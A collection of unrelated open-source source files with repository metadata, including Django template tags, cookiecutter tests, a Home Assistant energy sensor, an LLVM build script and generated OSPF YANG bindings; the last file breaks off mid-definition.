        if self.port:
            port = normalize_port(self.maybe_resolve(self.port, context))
        else:
            port = host.port
        hostname = reverse_host(host, args=host_args, kwargs=host_kwargs)
        uri = iri_to_uri('%s%s%s%s' % (scheme, hostname, port, path))
        if self.asvar:
            context[self.asvar] = uri
            return ''
        else:
            return uri


def parse_params(name, parser, bits):
    args = []
    kwargs = {}
    for bit in bits:
        match = kwarg_re.match(bit)
        if not match:
            raise TemplateSyntaxError("Malformed arguments to %s tag" % name)
        name, value = match.groups()
        if name:
            kwargs[name] = parser.compile_filter(value)
        else:
            args.append(parser.compile_filter(value))
    return args, kwargs


def fetch_arg(name, arg, bits, consume=True):
    try:
        pivot = bits.index(arg)
        try:
            value = bits[pivot + 1]
        except IndexError:
            raise TemplateSyntaxError("'%s' arguments must include "
                                      "a variable name after '%s'" % (name, arg))
        else:
            if consume:
                del bits[pivot:pivot + 2]
            return value, pivot, bits
    except ValueError:
        return None, None, bits


@register.tag
def host_url(parser, token):
    """
    Simple tag to reverse the URL including a host.

    {% host_url 'view-name' host 'host-name' %}
    {% host_url 'view-name' host 'host-name' 'spam' %}
    {% host_url 'view-name' host 'host-name' scheme 'https' %}
    {% host_url 'view-name' host 'host-name' as url_on_host_variable %}
    {% host_url 'view-name' varg1=vvalue1 host 'host-name' 'spam' 'hvalue1' %}
    {% host_url 'view-name' vvalue2 host 'host-name' 'spam' harg2=hvalue2 %}
    """
    bits = token.split_contents()
    name = bits[0]
    if len(bits) < 2:
        raise TemplateSyntaxError("'%s' takes at least one argument"
                                  " (path to a view)" % name)
    view_name = parser.compile_filter(bits[1])
    asvar, pivot, bits = fetch_arg(name, 'as', bits[1:])  # Strip off viewname
    scheme, pivot, bits = fetch_arg(name, 'scheme', bits)
    if scheme:
        scheme = parser.compile_filter(scheme)
    port, pivot, bits = fetch_arg(name, 'port', bits)
    if port:
        port = parser.compile_filter(port)
    host, pivot, bits = fetch_arg(name, 'host', bits, consume=False)
    if host:
        host = parser.compile_filter(host)
        view_args, view_kwargs = parse_params(name, parser, bits[1:pivot])
        host_args, host_kwargs = parse_params(name, parser, bits[pivot + 2:])
    else:
        # No host was given so use the default host
        host = settings.DEFAULT_HOST
        view_args, view_kwargs = parse_params(name, parser, bits[1:])
        host_args, host_kwargs = (), {}
    return HostURLNode(view_name=view_name, args=view_args, kwargs=view_kwargs,
                       asvar=asvar, host=host, host_args=host_args,
                       host_kwargs=host_kwargs, scheme=scheme, port=port)
jezdez/django-hosts
django_hosts/templatetags/hosts.py
Python
bsd-3-clause
5,070
0
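# An illustrative, standalone check (not part of django-hosts) of how the
# kwarg_re pattern used by parse_params above splits template-tag bits into
# positional and keyword arguments; the sample bits are made up.
import re

kwarg_re = re.compile(r"(?:(\w+)=)?(.+)")

for bit in ["'blog'", "year=2016", "slug=my-post"]:
    name, value = kwarg_re.match(bit).groups()
    print(name, value)
# prints: None 'blog'  /  year 2016  /  slug my-post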
# -*- coding: utf-8 -*- """test_replay.""" import os import pytest from cookiecutter import replay, main, exceptions def test_get_replay_file_name(): """Make sure that replay.get_file_name generates a valid json file path.""" exp_replay_file_name = os.path.join('foo', 'bar.json') assert replay.get_file_name('foo', 'bar') == exp_replay_file_name @pytest.mark.parametrize( 'invalid_kwargs', ({'no_input': True}, {'extra_context': {}}, {'no_input': True, 'extra_context': {}},) ) def test_raise_on_invalid_mode(invalid_kwargs): """Test `cookiecutter` raise exception on unacceptable `replay` request.""" with pytest.raises(exceptions.InvalidModeException): main.cookiecutter('foo', replay=True, **invalid_kwargs) def test_main_does_not_invoke_dump_but_load(mocker): """Test `cookiecutter` calling correct functions on `replay`.""" mock_prompt = mocker.patch('cookiecutter.main.prompt_for_config') mock_gen_context = mocker.patch('cookiecutter.main.generate_context') mock_gen_files = mocker.patch('cookiecutter.main.generate_files') mock_replay_dump = mocker.patch('cookiecutter.main.dump') mock_replay_load = mocker.patch('cookiecutter.main.load') main.cookiecutter('tests/fake-repo-tmpl/', replay=True) assert not mock_prompt.called assert not mock_gen_context.called assert not mock_replay_dump.called assert mock_replay_load.called assert mock_gen_files.called def test_main_does_not_invoke_load_but_dump(mocker): """Test `cookiecutter` calling correct functions on non-replay launch.""" mock_prompt = mocker.patch('cookiecutter.main.prompt_for_config') mock_gen_context = mocker.patch('cookiecutter.main.generate_context') mock_gen_files = mocker.patch('cookiecutter.main.generate_files') mock_replay_dump = mocker.patch('cookiecutter.main.dump') mock_replay_load = mocker.patch('cookiecutter.main.load') main.cookiecutter('tests/fake-repo-tmpl/', replay=False) assert mock_prompt.called assert mock_gen_context.called assert mock_replay_dump.called assert not mock_replay_load.called assert mock_gen_files.called
luzfcb/cookiecutter
tests/replay/test_replay.py
Python
bsd-3-clause
2,207
0
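# A quick interactive check mirroring test_get_replay_file_name above; it
# assumes cookiecutter is installed and simply shows the path the replay
# module builds for a directory/template name pair.
from cookiecutter import replay

print(replay.get_file_name('replay_dir', 'my-template'))
# expected: 'replay_dir/my-template.json' (with the platform's path separator)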
""" A collection of Xentica models and experiments. Indended to illustrate how to use the framework. """
a5kin/hecate
examples/__init__.py
Python
mit
107
0
import hashlib


def hash_list():
    return str(hashlib.algorithms_guaranteed)


def hash_text(algorithm_array, text, pass_count):
    result_dict = {}

    # Type checking
    if type(pass_count) is not int:
        return [False, {"error": "Pass count should be of 'integer' type."}]
    elif type(text) is not str:
        return [False, {"error": "Text should be of 'string' type."}]
    elif type(algorithm_array) is not list:
        return [False, {"error": "Algorithm list should be of 'list' type."}]

    # Bounds checking
    avail_alg_set = set(algorithm_array) & set(hashlib.algorithms_guaranteed)
    if pass_count > 1000000 or pass_count <= 0:
        return [False, {"error": "Pass count should be larger than 0 and smaller than 1000000."}]
    elif len(avail_alg_set) == 0:
        return [False, {"error": "None of these hash algorithms are available."}]

    # There is no error case; do the hash computations for every function
    for function in avail_alg_set:
        hash_val = text
        for _ in range(pass_count):
            hash_val = getattr(hashlib, function)(hash_val.encode()).hexdigest()
        result_dict[function] = hash_val

    return [True, result_dict]
tykkz/hasherapp
algorithm.py
Python
mit
1,194
0.002513
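# A short usage sketch for hash_text defined above; the algorithm names come
# from hashlib.algorithms_guaranteed, and the input text and pass count are
# arbitrary.
ok, result = hash_text(['sha256', 'md5'], 'hello world', 2)
if ok:
    for name, digest in sorted(result.items()):
        print(name, digest)
else:
    print(result['error'])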
#!/usr/bin/env python
import tester

tester.make(["--input='./result/standard'", "--output='./result/out'", "--standard", "--cores=1"])
ONLYOFFICE/core
Test/Applications/StandardTester/tester/scripts/generate.py
Python
agpl-3.0
134
0.014925
# -*- coding: utf-8 -*- """ :copyright: Copyright 2013 by Łukasz Mierzwa :contact: l.mierzwa@gmail.com """ from __future__ import unicode_literals import logging from inspect import ismethod from django.utils.html import escape from django.utils.safestring import mark_safe from django.utils.encoding import smart_text from django.db.models import Model from django.conf import settings from django import template, VERSION from six import wraps if VERSION >= (3, 0): from django.utils.translation import gettext as _ else: from django.utils.translation import ugettext as _ if VERSION >= (2, 0): from django.urls import (reverse, resolve, NoReverseMatch, Resolver404) else: from django.core.urlresolvers import (reverse, resolve, NoReverseMatch, Resolver404) logger = logging.getLogger(__name__) register = template.Library() CONTEXT_KEY = 'DJANGO_BREADCRUMB_LINKS' def log_request_not_found(): if VERSION < (1, 8): # pragma: nocover logger.error("request object not found in context! Check if " "'django.core.context_processors.request' is in " "TEMPLATE_CONTEXT_PROCESSORS") else: # pragma: nocover logger.error("request object not found in context! Check if " "'django.template.context_processors.request' is in the " "'context_processors' option of your template settings.") def requires_request(func): @wraps(func) def wrapped(context, *args, **kwargs): if 'request' in context: return func(context, *args, **kwargs) log_request_not_found() return '' return wrapped @requires_request def append_breadcrumb(context, label, viewname, args, kwargs): context['request'].META[CONTEXT_KEY] = context['request'].META.get( CONTEXT_KEY, []) + [(label, viewname, args, kwargs)] @register.simple_tag(takes_context=True) def breadcrumb(context, label, viewname, *args, **kwargs): """ Add link to list of breadcrumbs, usage: {% load bubbles_breadcrumbs %} {% breadcrumb "Home" "index" %} Remember to use it inside {% block %} with {{ block.super }} to get all parent breadcrumbs. :param label: Breadcrumb link label. :param viewname: Name of the view to link this breadcrumb to, or Model instance with implemented get_absolute_url(). :param args: Any arguments to view function. """ append_breadcrumb(context, _(escape(label)), viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) def breadcrumb_safe(context, label, viewname, *args, **kwargs): """ Same as breadcrumb but label is not escaped. """ append_breadcrumb(context, _(label), viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) def breadcrumb_raw(context, label, viewname, *args, **kwargs): """ Same as breadcrumb but label is not translated. """ append_breadcrumb(context, escape(label), viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) def breadcrumb_raw_safe(context, label, viewname, *args, **kwargs): """ Same as breadcrumb but label is not escaped and translated. """ append_breadcrumb(context, label, viewname, args, kwargs) return '' @register.simple_tag(takes_context=True) @requires_request def render_breadcrumbs(context, *args): """ Render breadcrumbs html using bootstrap css classes. 
""" try: template_path = args[0] except IndexError: template_path = getattr(settings, 'BREADCRUMBS_TEMPLATE', 'django_bootstrap_breadcrumbs/bootstrap2.html') links = [] for (label, viewname, view_args, view_kwargs) in context[ 'request'].META.get(CONTEXT_KEY, []): if isinstance(viewname, Model) and hasattr( viewname, 'get_absolute_url') and ismethod( viewname.get_absolute_url): url = viewname.get_absolute_url(*view_args, **view_kwargs) else: try: try: # 'resolver_match' introduced in Django 1.5 current_app = context['request'].resolver_match.namespace except AttributeError: try: resolver_match = resolve(context['request'].path) current_app = resolver_match.namespace except Resolver404: current_app = None url = reverse(viewname=viewname, args=view_args, kwargs=view_kwargs, current_app=current_app) except NoReverseMatch: url = viewname links.append((url, smart_text(label) if label else label)) if not links: return '' if VERSION > (1, 8): # pragma: nocover # RequestContext is deprecated in recent django # https://docs.djangoproject.com/en/1.10/ref/templates/upgrading/ context = context.flatten() context['breadcrumbs'] = links context['breadcrumbs_total'] = len(links) return mark_safe(template.loader.render_to_string(template_path, context)) class BreadcrumbNode(template.Node): def __init__(self, nodelist, viewname, args): self.nodelist = nodelist self.viewname = viewname self.args = list(args) self.kwargs = {} for arg in args: if '=' in arg: name = arg.split('=')[0] val = '='.join(arg.split('=')[1:]) self.kwargs[name] = val self.args.remove(arg) def render(self, context): if 'request' not in context: log_request_not_found() return '' label = self.nodelist.render(context) try: viewname = template.Variable(self.viewname).resolve(context) except template.VariableDoesNotExist: viewname = self.viewname args = self.parse_args(context) kwargs = self.parse_kwargs(context) append_breadcrumb(context, label, viewname, args, kwargs) return '' def parse_args(self, context): args = [] for arg in self.args: try: value = template.Variable(arg).resolve(context) except template.VariableDoesNotExist: value = arg args.append(value) return args def parse_kwargs(self, context): kwargs = {} for name, val in self.kwargs.items(): try: value = template.Variable(val).resolve(context) except template.VariableDoesNotExist: value = val kwargs[name] = value return kwargs @register.tag def breadcrumb_for(parser, token): bits = list(token.split_contents()) end_tag = 'end' + bits[0] nodelist = parser.parse((end_tag,)) parser.delete_first_token() return BreadcrumbNode(nodelist, bits[1], bits[2:]) @register.simple_tag(takes_context=True) @requires_request def clear_breadcrumbs(context, *args): """ Removes all currently added breadcrumbs. """ context['request'].META.pop(CONTEXT_KEY, None) return ''
prymitive/bootstrap-breadcrumbs
django_bootstrap_breadcrumbs/templatetags/django_bootstrap_breadcrumbs.py
Python
mit
7,292
0
#!/usr/bin/env python3 from auto.config import DIR, RV32_LINUX from auto.gnu_toolchain import GnuToolchain from auto.utils import cat, cd, path, shell import auto.pkg import os class LLVM(auto.pkg.Package): def _prepare(self): link = path(DIR.submodules, "llvm/tools/clang") if not os.path.exists(link): shell("ln -sf {}/clang {}".format(DIR.submodules, link)) # Apply patches llvm_dir = path(DIR.submodules, "llvm") clang_dir = path(DIR.submodules, "clang") with cd(DIR.patches): llvm_patches = shell("ls 0?-relax-*", save_out=True).strip().split() clang_patches = shell("ls 0?-clang-*", save_out=True).strip().split() if not os.path.exists(path(llvm_dir, ".patched")): with cd(llvm_dir): for p in llvm_patches: shell("patch -p0 < {}/{}".format(DIR.patches, p)) shell("touch .patched") if not os.path.exists(path(clang_dir, ".patched")): with cd(clang_dir): for p in clang_patches: shell("patch -p0 < {}/{}".format(DIR.patches, p)) shell("touch .patched") def _build(self): shell("cmake --build {} -- {}".format(self.build_dir, self.make_opts)) def _install(self): shell("cmake --build {} --target install".format(self.build_dir)) def _postinstall(self): srcdir = path(self.build_dir, "lib/Target/RISCV") dstdir = path(self.prefix, "include/llvm/Target/RISCV") shell("mkdir -p " + dstdir) for f in ["RISCVGenInstrInfo.inc", "RISCVGenRegisterInfo.inc"]: shell("cp {0}/{2} {1}/{2}".format(srcdir, dstdir, f)) def _pkgs(): # lowrisc llvm name = "llvm" prefix = DIR.toolchain_debug build_dir = path(DIR.build, "llvm") def configure(clang_ver, prefix, gnu_tc_prefix): return cat( "cmake", "-G Ninja", '-DLLVM_TARGETS_TO_BUILD="ARM;X86"', "-DCMAKE_BUILD_TYPE=Debug", "-DBUILD_SHARED_LIBS=True", "-DLLVM_USE_SPLIT_DWARF=True", "-DLLVM_OPTIMIZED_TABLEGEN=True", "-DLLVM_BUILD_TESTS=True", "-DCMAKE_C_COMPILER=/usr/bin/clang-{0}", "-DCMAKE_CXX_COMPILER=/usr/bin/clang++-{0}", "-DGCC_INSTALL_PREFIX={2}", "-DLLVM_DEFAULT_TARGET_TRIPLE=" + RV32_LINUX.triple, '-DLLVM_EXPERIMENTAL_TARGETS_TO_BUILD="RISCV"', "-DCMAKE_INSTALL_PREFIX={1}", path(DIR.submodules, "llvm")).format( clang_ver, prefix, gnu_tc_prefix) makefile = "build.ninja" out = "bin/clang" toolchain = "bin/clang" deps = ["riscv-gnu-toolchain-newlib"] pkg0 = LLVM(name, prefix, build_dir, makefile=makefile, configure=configure("3.9", prefix, GnuToolchain.PREFIX), build_out=out, toolchain=toolchain, deps=deps) name = "llvm-gcc7" prefix = path(DIR.toolchain_debug, "gcc7") build_dir = path(DIR.build, "llvm-gcc7") pkg1 = LLVM(name, prefix, build_dir, makefile=makefile, configure=configure("6.0", prefix, GnuToolchain.PREFIX_GCC7), build_out=out, toolchain=toolchain, deps=deps) return [pkg0, pkg1] auto.pkg.Package.pkgs.extend(_pkgs())
OpenISA/riscv-sbt
scripts/auto/llvm.py
Python
mit
3,402
0.004409
"""Support for OVO Energy sensors.""" from __future__ import annotations from collections.abc import Callable from dataclasses import dataclass from datetime import datetime, timedelta from typing import Final from ovoenergy import OVODailyUsage from ovoenergy.ovoenergy import OVOEnergy from homeassistant.components.sensor import ( SensorDeviceClass, SensorEntity, SensorEntityDescription, SensorStateClass, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ENERGY_KILO_WATT_HOUR from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import StateType from homeassistant.helpers.update_coordinator import DataUpdateCoordinator from homeassistant.util import dt as dt_util from . import OVOEnergyDeviceEntity from .const import DATA_CLIENT, DATA_COORDINATOR, DOMAIN SCAN_INTERVAL = timedelta(seconds=300) PARALLEL_UPDATES = 4 KEY_LAST_ELECTRICITY_COST: Final = "last_electricity_cost" KEY_LAST_GAS_COST: Final = "last_gas_cost" @dataclass class OVOEnergySensorEntityDescription(SensorEntityDescription): """Class describing System Bridge sensor entities.""" value: Callable[[OVODailyUsage], StateType | datetime] = round SENSOR_TYPES_ELECTRICITY: tuple[OVOEnergySensorEntityDescription, ...] = ( OVOEnergySensorEntityDescription( key="last_electricity_reading", name="OVO Last Electricity Reading", device_class=SensorDeviceClass.ENERGY, state_class=SensorStateClass.TOTAL_INCREASING, native_unit_of_measurement=ENERGY_KILO_WATT_HOUR, value=lambda usage: usage.electricity[-1].consumption, ), OVOEnergySensorEntityDescription( key=KEY_LAST_ELECTRICITY_COST, name="OVO Last Electricity Cost", device_class=SensorDeviceClass.MONETARY, state_class=SensorStateClass.TOTAL_INCREASING, value=lambda usage: usage.electricity[-1].cost.amount if usage.electricity[-1].cost is not None else None, ), OVOEnergySensorEntityDescription( key="last_electricity_start_time", name="OVO Last Electricity Start Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.start), ), OVOEnergySensorEntityDescription( key="last_electricity_end_time", name="OVO Last Electricity End Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.end), ), ) SENSOR_TYPES_GAS: tuple[OVOEnergySensorEntityDescription, ...] 
= ( OVOEnergySensorEntityDescription( key="last_gas_reading", name="OVO Last Gas Reading", device_class=SensorDeviceClass.ENERGY, state_class=SensorStateClass.TOTAL_INCREASING, native_unit_of_measurement=ENERGY_KILO_WATT_HOUR, icon="mdi:gas-cylinder", value=lambda usage: usage.gas[-1].consumption, ), OVOEnergySensorEntityDescription( key=KEY_LAST_GAS_COST, name="OVO Last Gas Cost", device_class=SensorDeviceClass.MONETARY, state_class=SensorStateClass.TOTAL_INCREASING, icon="mdi:cash-multiple", value=lambda usage: usage.gas[-1].cost.amount if usage.gas[-1].cost is not None else None, ), OVOEnergySensorEntityDescription( key="last_gas_start_time", name="OVO Last Gas Start Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.start), ), OVOEnergySensorEntityDescription( key="last_gas_end_time", name="OVO Last Gas End Time", entity_registry_enabled_default=False, device_class=SensorDeviceClass.TIMESTAMP, value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.end), ), ) async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up OVO Energy sensor based on a config entry.""" coordinator: DataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id][ DATA_COORDINATOR ] client: OVOEnergy = hass.data[DOMAIN][entry.entry_id][DATA_CLIENT] entities = [] if coordinator.data: if coordinator.data.electricity: for description in SENSOR_TYPES_ELECTRICITY: if ( description.key == KEY_LAST_ELECTRICITY_COST and coordinator.data.electricity[-1] is not None and coordinator.data.electricity[-1].cost is not None ): description.native_unit_of_measurement = ( coordinator.data.electricity[-1].cost.currency_unit ) entities.append(OVOEnergySensor(coordinator, description, client)) if coordinator.data.gas: for description in SENSOR_TYPES_GAS: if ( description.key == KEY_LAST_GAS_COST and coordinator.data.gas[-1] is not None and coordinator.data.gas[-1].cost is not None ): description.native_unit_of_measurement = coordinator.data.gas[ -1 ].cost.currency_unit entities.append(OVOEnergySensor(coordinator, description, client)) async_add_entities(entities, True) class OVOEnergySensor(OVOEnergyDeviceEntity, SensorEntity): """Define a OVO Energy sensor.""" coordinator: DataUpdateCoordinator entity_description: OVOEnergySensorEntityDescription def __init__( self, coordinator: DataUpdateCoordinator, description: OVOEnergySensorEntityDescription, client: OVOEnergy, ) -> None: """Initialize.""" super().__init__( coordinator, client, ) self._attr_unique_id = f"{DOMAIN}_{client.account_id}_{description.key}" self.entity_description = description @property def native_value(self) -> StateType | datetime: """Return the state.""" usage: OVODailyUsage = self.coordinator.data return self.entity_description.value(usage)
rohitranjan1991/home-assistant
homeassistant/components/ovo_energy/sensor.py
Python
mit
6,463
0.000928
""" @file test_gyro_lsm330dlc.py """ ## # @addtogroup soletta sensor # @brief This is sensor test based on soletta app # @brief test sensor lsm330dlc on Galileo/MinnowMax/Edison ## import os import time from oeqa.utils.helper import shell_cmd from oeqa.oetest import oeRuntimeTest from EnvirSetup import EnvirSetup from oeqa.utils.decorators import tag @tag(TestType="FVT", FeatureID="IOTOS-757") class TestGyroLSM330DLC(oeRuntimeTest): """ @class TestGyroLSM330DLC """ def setUp(self): '''Generate fbp file on target @fn setUp @param self @return''' print 'start!\n' #connect sensor and DUT through board #shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py lsm330dlc") envir = EnvirSetup(self.target) envir.envirSetup("lsm330dlc","gyro") def tearDown(self): '''unload lsm330dlc driver @fn tearDown @param self @return''' (status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name") if "Minnow" in output: (status, output) = self.target.run( "cd /sys/bus/i2c/devices; \ echo 0x6b >i2c-1/delete_device") if "Galileo" in output: (status, output) = self.target.run( "cd /sys/bus/i2c/devices; \ echo 0x6b >i2c-0/delete_device") if "BODEGA" in output: (status, output) = self.target.run( "cd /sys/bus/i2c/devices; \ echo 0x6b >i2c-6/delete_device") def test_Gyro_LSM330DLC(self): '''Execute the test app and verify sensor data @fn test_Gyro_LSM330DLC @param self @return''' print 'start reading data!' (status, output) = self.target.run( "chmod 777 /opt/apps/test_gyro_lsm330dlc.fbp") (status, output) = self.target.run( "cd /opt/apps; ./test_gyro_lsm330dlc.fbp >re.log") error = output (status, output) = self.target.run( "cp /opt/apps/re.log /home/root/lsm330dlc.log") (status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector") print output + "\n" self.assertEqual(status, 0, msg="Error messages: %s" % error) #make sure sensor data is valid (status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'") self.assertEqual(status, 1, msg="Error messages: %s" % output)
daweiwu/meta-iotqa-1
lib/oeqa/runtime/sensor/test_gyro_lsm330dlc.py
Python
mit
2,634
0.006834
# -*- coding: utf-8 -*- from operator import attrgetter from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType from pyangbind.lib.yangtypes import RestrictedClassType from pyangbind.lib.yangtypes import TypedListType from pyangbind.lib.yangtypes import YANGBool from pyangbind.lib.yangtypes import YANGListType from pyangbind.lib.yangtypes import YANGDynClass from pyangbind.lib.yangtypes import ReferenceType from pyangbind.lib.base import PybindBase from collections import OrderedDict from decimal import Decimal from bitarray import bitarray import six # PY3 support of some PY2 keywords (needs improved) if six.PY3: import builtins as __builtin__ long = int elif six.PY2: import __builtin__ from . import state from . import types_of_service class as_external_lsa(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Contents of the AS External LSA """ __slots__ = ("_path_helper", "_extmethods", "__state", "__types_of_service") _yang_name = "as-external-lsa" _pybind_generated_by = "container" def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "ospfv2", "areas", "area", "lsdb", "lsa-types", "lsa-type", "lsas", "lsa", "as-external-lsa", ] def _get_state(self): """ Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) YANG Description: State parameters for the AS external LSA """ return self.__state def _set_state(self, v, load=False): """ Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) If this variable 
is read-only (config: false) in the source YANG file, then _set_state is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_state() directly. YANG Description: State parameters for the AS external LSA """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """state must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__state = t if hasattr(self, "_set"): self._set() def _unset_state(self): self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) def _get_types_of_service(self): """ Getter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ return self.__types_of_service def _set_types_of_service(self, v, load=False): """ Setter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) If this variable is read-only (config: false) in the source YANG file, then _set_types_of_service is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_types_of_service() directly. 
YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """types_of_service must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=types_of_service.types_of_service, is_container='container', yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__types_of_service = t if hasattr(self, "_set"): self._set() def _unset_types_of_service(self): self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) state = __builtin__.property(_get_state) types_of_service = __builtin__.property(_get_types_of_service) _pyangbind_elements = OrderedDict( [("state", state), ("types_of_service", types_of_service)] ) from . import state from . import types_of_service class as_external_lsa(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa. Each member element of the container is represented as a class variable - with a specific YANG type. 
YANG Description: Contents of the AS External LSA """ __slots__ = ("_path_helper", "_extmethods", "__state", "__types_of_service") _yang_name = "as-external-lsa" _pybind_generated_by = "container" def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "ospfv2", "areas", "area", "lsdb", "lsa-types", "lsa-type", "lsas", "lsa", "as-external-lsa", ] def _get_state(self): """ Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) YANG Description: State parameters for the AS external LSA """ return self.__state def _set_state(self, v, load=False): """ Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) If this variable is read-only (config: false) in the source YANG file, then _set_state is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_state() directly. 
